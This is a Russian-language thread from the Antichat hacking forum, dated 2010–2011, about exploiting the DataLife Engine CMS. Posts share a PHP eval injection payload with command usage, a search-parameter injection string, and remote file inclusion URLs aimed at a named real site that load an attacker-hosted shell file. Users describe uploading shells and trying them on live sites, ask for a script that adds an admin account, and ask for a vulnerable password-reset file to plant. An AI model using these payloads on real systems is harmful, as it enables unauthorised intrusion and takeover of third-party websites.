HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #191  
Старый 18.09.2010, 20:48
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html

)), пофиксели мой приватный способ заливки шелла
 
Ответить с цитированием

  #192  
Старый 21.09.2010, 15:30
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию

Там два момента. На мой взгялд они не связаны (с поиском и средактором шаблона). Редактор доступен только из админки, и вот что мне удалось натестить:

Если отправить POST запрос приблизительного следующего содержания:

Код HTML:
HTML:
 

 
кнопка сабмит где то тут...
Поигратся с кавычками, то можно затолкать туда php код для исполнения...

С поиском так и не понял, что можно намутить

__________________________________

К моему предедёщему посту дополнение.

В POST запросе нужно отправить:

Код:
Code:
{${@eval($_GET[cmd])}}
после этого любая комманды вида:

site.ru/?cmd=echo%20phpinfo();

ЗЫ комманда д.б. закодирована urlencode();

___________________________________

не стоим на месте:

"глобальные массивы" д.б. ОN, а дальше:

?do=search&subaction=search&story=bla-bla&sql_count=Sql_Que..&titleonly=FOUR
 
Ответить с цитированием

  #193  
Старый 25.09.2010, 13:43
oko
Познающий
Регистрация: 01.05.2010
Сообщений: 34
Провел на форуме:
118737

Репутация: -5
По умолчанию

Кто скажет что про это, http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html какой то баг видно серьезный нашли
 
Ответить с цитированием

  #194  
Старый 25.09.2010, 13:51
LamerHacker
Guest
Сообщений: n/a
Провел на форуме:
1931

Репутация: 0
По умолчанию

oko, а в посте перед тобой о чем расписано ?

slva2000, получается воспользоваться багом с редактором шаблона можно только через админку ?

И можешь чуть поподробней расписать, как использовать баг с поиском?
 
Ответить с цитированием

  #195  
Старый 19.10.2010, 11:05
FlooP1k
Guest
Сообщений: n/a
Провел на форуме:
30137

Репутация: 48
По умолчанию

Помогите написать скрипт для ДЛЕ, что бы он добавил нового пользователя в бд с правами админа ...
 
Ответить с цитированием

  #196  
Старый 04.11.2010, 13:58
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию

Раскрытие префикса к БД

версии, вероятно, до 8.0

1. Регаешься

2. Авторизируешься

3. Смотриш куку с именем, вида XXXX_name, которая принимает значение твоего логина,

где XXXX - префикс к БД.
 
Ответить с цитированием

  #197  
Старый 20.11.2010, 23:32
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от slva2000  
slva2000 said:
Раскрытие префикса к БД
версии, вероятно, до 8.0
1. Регаешься
2. Авторизируешься
3. Смотриш куку с именем, вида
XXXX
_name, которая принимает значение твоего логина,
где XXXX - префикс к БД.
Это не префикс к БД, это просто название куки, она всегда dle_name, есть еще dle_password, dle_pm и dle_user_id. Проверено на dle7.0, dle7.3 и dle 7.5
 
Ответить с цитированием

  #198  
Старый 03.02.2011, 03:58
RexTiam
Постоянный
Регистрация: 02.11.2009
Сообщений: 341
Провел на форуме:
599124

Репутация: 65
По умолчанию

Выкладываю несколько сплоитов для DLE 8.3

ttp://skripters.com/engine/inc/include/init.php?selected_language=http://loca

lhost/c.txt?

http://skripters.com/engine/inc/help.php?config[langs]=http://localhost/c.txt

?

http://skripters.com/engine/ajax/pm.php?config[lang_=[EV!L]

http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local

host/c.txt?

http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local

host/c.txt?
 
Ответить с цитированием

  #199  
Старый 05.02.2011, 01:54
flinster
Guest
Сообщений: n/a
Провел на форуме:
18455

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
Выкладываю несколько сплоитов для DLE 8.3
ttp://skripters.com/engine/inc/include/init.php?selected_language=http://loca
lhost/c.txt?
http://skripters.com/engine/inc/help.php?config[langs]=http://localhost/c.txt
?
http://skripters.com/engine/ajax/pm.php?config[lang_=[EV!L]
http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local
host/c.txt?
http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local
host/c.txt?
Чет не врубился как юзать, подробнее можете расписать?

Я так понимаю заливаем шелл.

Залил я шелл допустим на народ, нашел парочку сайтов на дле данной версии и пробую... на некоторых просто белая страница, на других вылазиет какая то ошибка.
 
Ответить с цитированием

  #200  
Старый 07.02.2011, 01:17
Eviler
Новичок
Регистрация: 25.08.2009
Сообщений: 0
Провел на форуме:
15030

Репутация: 0
По умолчанию

ребят, у кого осталась уязвимая версия lostpassword.php для 8,2 или кто может сделать такую же темку для 8,3?) надо прикрутить на сайт)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ